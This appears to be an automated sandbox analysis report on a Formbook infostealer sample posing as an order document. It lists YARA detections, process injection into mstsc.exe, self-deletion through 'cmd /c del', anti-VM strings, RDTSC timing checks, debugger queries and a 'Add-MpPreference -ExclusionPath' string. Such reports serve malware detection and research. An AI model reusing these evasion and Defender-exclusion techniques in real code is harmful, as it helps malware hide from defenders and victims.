          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.931109256.0000000000840000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000003.00000002.932653703.0000000004960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.Order 122001-220 guanzo.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@13/7
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order 122001-220 guanzo.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:808:120:WilError_01
          Source: Order 122001-220 guanzo.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
          Source: Order 122001-220 guanzo.exeVirustotal: Detection: 62%
          Source: Order 122001-220 guanzo.exeMetadefender: Detection: 32%
          Source: Order 122001-220 guanzo.exeReversingLabs: Detection: 65%
          Source: unknownProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: Order 122001-220 guanzo.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: Order 122001-220 guanzo.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: Order 122001-220 guanzo.exe, 00000001.00000002.708808706.00000000019DF000.00000040.00000001.sdmp, mstsc.exe, 00000003.00000002.932738473.0000000004AB0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: Order 122001-220 guanzo.exe, mstsc.exe
          Source: Binary string: mstsc.pdbGCTL source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: Order 122001-220 guanzo.exe, 00000001.00000002.709202220.0000000003530000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000000.684774940.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B3B5 push eax; ret
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B46C push eax; ret
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B402 push eax; ret
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0041B40B push eax; ret
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00414DB2 push ebx; retf
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00416ED7 push es; ret
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0193D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B2D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B3B5 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B402 push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B40B push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_0085B46C push eax; ret
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00854DB2 push ebx; retf
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_00856ED7 push es; ret
          Source: initial sampleStatic PE information: section name: .text entropy: 7.76742936293
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\mstsc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Order 122001-220 guanzo.exe PID: 864, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 00000000008485E4 second address: 00000000008485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 000000000084897E second address: 0000000000848984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4660Thread sleep time: -101967s >= -30000s
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exe TID: 4944Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5588Thread sleep time: -50000s >= -30000s
          Source: C:\Windows\SysWOW64\mstsc.exe TID: 6076Thread sleep time: -52000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\mstsc.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 101967
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread delayed: delay time: 922337203685477
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: 6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&^
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.693144077.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000002.00000000.685203487.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.693144077.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.939807233.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: explorer.exe, 00000002.00000000.693679167.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: Order 122001-220 guanzo.exe, 00000000.00000002.672340079.000000000259A000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000002.00000000.684582296.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\mstsc.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_004088B0 rdtsc
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_00409B20 LdrLoadDll,
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01912581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0190C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01911DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019651BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019135A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019669A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019161A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01966DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01998DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018EB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018FD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019741E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018E9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0196A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019AE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01914D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_0191513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_019B8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_01904120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeCode function: 1_2_018F3D34 mov eax, dword ptr fs:[00000030h]
